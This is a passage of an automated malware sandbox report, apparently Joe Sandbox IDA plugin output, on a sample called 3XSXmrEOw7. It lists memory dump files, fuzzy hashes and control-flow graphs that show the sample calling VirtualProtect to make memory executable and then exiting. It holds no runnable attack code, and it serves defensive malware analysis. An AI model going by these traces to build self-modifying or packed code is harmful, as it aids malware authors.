                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: d8c32f27cfc5d901a96705040dc726f393045433d68751bcca934b27c13b3a32
                                                                                                                        • Instruction ID: cf000f9f2d6c84c8d3ce0dac07b7f877c0778feaaefee545d6c19c651e8d1ed7
                                                                                                                        • Opcode Fuzzy Hash: d8c32f27cfc5d901a96705040dc726f393045433d68751bcca934b27c13b3a32
                                                                                                                        • Instruction Fuzzy Hash: F0E114B2D082689AF7208624DC44BEB7A68EF51314F1440FED94D67281D6BE1FC58BA7

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 4a0411652cf470597e9e485effa7868a9c99ab21ceb968b5f09b91b25baa5950
                                                                                                                        • Instruction ID: ea58bfbc0dd8c397f22414f43d59e966c6f640d547af9d12bb140abd4150adc7
                                                                                                                        • Opcode Fuzzy Hash: 4a0411652cf470597e9e485effa7868a9c99ab21ceb968b5f09b91b25baa5950
                                                                                                                        • Instruction Fuzzy Hash: 08D123B2D082649AF7208624DC44BEB7A69DF50314F1440FED94D662C1DABE1FC68B67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 936 4075c0-4075d7 938 407619 936->938 939 4075d9-407631 936->939 938->938 944 4076d3-407714 call 407716 939->944 945 407637-407690 939->945 945->944 950 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 945->950 976 408828-408a77 call 4089ff 950->976 977 4094b9-4095cb call 4094db call 40950b call 4095cc 950->977 993 408a79-408ab5 976->993 994 408aba-408ae7 call 408ae8 976->994 1008 409f60-409f62 ExitProcess 977->1008 1001 408e4f-408e56 993->1001 994->1001 1004 408e58-408e94 1001->1004 1005 408e99-408ecf call 408ed1 1001->1005 1004->1008 1005->1008
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 8efa2fc18f11feecf9e72f35dc03a98d40f6573ae9cc8823b81c0489b360da7c
                                                                                                                        • Instruction ID: c3c9fe27aa97eefe4607321597f7646c91d95a2a7d095fabcd85beefab367c0e
                                                                                                                        • Opcode Fuzzy Hash: 8efa2fc18f11feecf9e72f35dc03a98d40f6573ae9cc8823b81c0489b360da7c
                                                                                                                        • Instruction Fuzzy Hash: AAD135B2C082649AF7208624DC44BEB7A69DF51314F1440FED94D662C1DABE1FC6CB67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1080 4075e0-407631 1083 4076d3-407714 call 407716 1080->1083 1084 407637-407690 1080->1084 1084->1083 1089 407692-408822 call 4076aa call 4076c0 VirtualProtect call 40838a call 4083a8 call 40841d 1084->1089 1115 408828-408a77 call 4089ff 1089->1115 1116 4094b9-4095cb call 4094db call 40950b call 4095cc 1089->1116 1132 408a79-408ab5 1115->1132 1133 408aba-408ae7 call 408ae8 1115->1133 1147 409f60-409f62 ExitProcess 1116->1147 1140 408e4f-408e56 1132->1140 1133->1140 1143 408e58-408e94 1140->1143 1144 408e99-408ecf call 408ed1 1140->1144 1143->1147 1144->1147
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 48533f2cbce7cdaf1ed70220ab39ca012e3d16fecf106e9b81853bb4f7082912
                                                                                                                        • Instruction ID: ba5505202cf962745bbe92fa0db4f2cdf567307ff8a9c8f7b4a3d42c12a6f098
                                                                                                                        • Opcode Fuzzy Hash: 48533f2cbce7cdaf1ed70220ab39ca012e3d16fecf106e9b81853bb4f7082912
                                                                                                                        • Instruction Fuzzy Hash: 6ED134B2C082649AF7208624DC447EB7A69DF51314F0840FED98D662C1DABE1FC6CB67

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1012 406f0b-406f1f 1013 406f71-408822 VirtualProtect call 40838a call 4083a8 call 40841d 1012->1013 1014 406f21-406f44 1012->1014 1044 408828-408a77 call 4089ff 1013->1044 1045 4094b9-4095cb call 4094db call 40950b call 4095cc 1013->1045 1017 406f52 1014->1017 1018 406f46-406f50 1014->1018 1020 406f5c-406f6f 1017->1020 1018->1020 1020->1013 1024 406fb4-406fcb call 406fd0 1020->1024 1061 408a79-408ab5 1044->1061 1062 408aba-408ae7 call 408ae8 1044->1062 1076 409f60-409f62 ExitProcess 1045->1076 1069 408e4f-408e56 1061->1069 1062->1069 1072 408e58-408e94 1069->1072 1073 408e99-408ecf call 408ed1 1069->1073 1072->1076 1073->1076
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: d8dd47f1f8f6d29029304bd3571b97d78ed37f7ea15542f81214fd2d6cb6517b
                                                                                                                        • Instruction ID: 16e97a4dc2b1b72941229be2b9302e60e6d9b11039a76407f9f1745cf537d380
                                                                                                                        • Opcode Fuzzy Hash: d8dd47f1f8f6d29029304bd3571b97d78ed37f7ea15542f81214fd2d6cb6517b
                                                                                                                        • Instruction Fuzzy Hash: 13D125A2C082649AF7208624EC447EB7A68EF51314F1440FED94DA62C1D6BE1FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 9a29111bdd617bf36b934546c4c89c15ad789a813333cfd5b2bd9c88ef55fba9
                                                                                                                        • Instruction ID: e00debdacd192d099ab58c28448140415868ac13b88858dbeb5059bbadf96c13
                                                                                                                        • Opcode Fuzzy Hash: 9a29111bdd617bf36b934546c4c89c15ad789a813333cfd5b2bd9c88ef55fba9
                                                                                                                        • Instruction Fuzzy Hash: EBD127A2D082649AF7208624DC44BEB7A69DB51310F1440FED94DA72C1D6BE1FC6CBA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: c973c8076e2ec20e1500df515ef5ce8f7e3f02c717afe02f686bf680397f98d1
                                                                                                                        • Instruction ID: 2b20349ff3622c334264f6a588594712d4e80cc894e6c7ba1984c525794e84a0
                                                                                                                        • Opcode Fuzzy Hash: c973c8076e2ec20e1500df515ef5ce8f7e3f02c717afe02f686bf680397f98d1
                                                                                                                        • Instruction Fuzzy Hash: 1BD134B2C082649AF7208624DC447EB7A69DF50314F0440FED98D662C1DABE5FC6CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: d4b94b1edf620e75fcdf4d1daecaa1fdd83cbeab1cbb3806c3cf8b24fd04c183
                                                                                                                        • Instruction ID: 5bf602528398837073a20d5b518e155b67223abd0f1d5e59e04288b574140e96
                                                                                                                        • Opcode Fuzzy Hash: d4b94b1edf620e75fcdf4d1daecaa1fdd83cbeab1cbb3806c3cf8b24fd04c183
                                                                                                                        • Instruction Fuzzy Hash: 22D136A2D082649AF7208624DC447EB7A69DF51314F0440FED94D672C1DABE1FC6CBA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
